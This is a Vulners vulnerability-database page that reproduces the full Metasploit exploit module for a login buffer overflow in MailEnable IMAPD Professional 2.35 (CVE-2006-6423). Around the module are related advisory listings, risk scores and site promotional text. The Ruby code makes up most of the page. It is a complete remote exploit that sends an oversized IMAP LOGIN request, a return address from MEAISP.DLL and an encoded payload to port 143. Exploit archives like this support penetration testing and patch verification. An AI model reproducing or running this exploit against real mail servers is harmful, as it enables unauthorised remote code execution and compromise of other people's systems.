Lucene search
K

MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)

🗓️ 30 Apr 2010 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

MailEnable IMAPD Professional (2.35) - Login Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2006-6423
30 Apr 201000:00
circl
Check Point Advisories
Preemptive Protection against MailEnable IMAP Service Remote Code Execution Vulnerability
19 Dec 200600:00
checkpoint_advisories
CVE
CVE-2006-6423
12 Dec 200602:00
cve
Cvelist
CVE-2006-6423
12 Dec 200602:00
cvelist
Tenable Nessus
MailEnable IMAP Server Multiple Buffer Overflow Vulnerabilities (ME-10025)
10 Dec 200600:00
nessus
Metasploit
MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow
11 Dec 200619:21
metasploit
NVD
CVE-2006-6423
12 Dec 200602:28
nvd
Packet Storm
MailEnable IMAPD (2.35) Login Request Buffer Overflow
26 Nov 200900:00
packetstorm
Prion
Stack overflow
7 Mar 200700:19
prion
##
# $Id: mailenable_login.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MailEnable IMAPD (2.35) Login Request Buffer Overflow',
			'Description'    => %q{
					MailEnable's IMAP server contains a buffer overflow
				vulnerability in the Login command.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2006-6423'],
					[ 'OSVDB', '32125'],
					[ 'BID', '21492'],
					[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051229.html'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 450,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'MailEnable 2.35 Pro',  { 'Ret' =>  0x10049abb } ], #MEAISP.DLL
				],
			'DisclosureDate' => 'Dec 11 2006',
			'DefaultTarget' => 0))

		register_options( [ Opt::RPORT(143) ], self.class )
	end

	def exploit
		connect

		auth	=   "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n"
		sploit	=   rand_text_alpha_upper(556) + [target.ret].pack('V')
		sploit	<<  payload.encoded + "\r\n\r\n"

		res = sock.recv(50)
			if ( res =~ / OK IMAP4rev1/)
				print_status("Trying target #{target.name}...")
				sock.put(auth)
				sock.get_once(-1, 3)
				sock.put(sploit)
			else
				print_status("Not running IMAP4rev1...")
			end

		handler
		disconnect
	end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Apr 2010 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.47443
35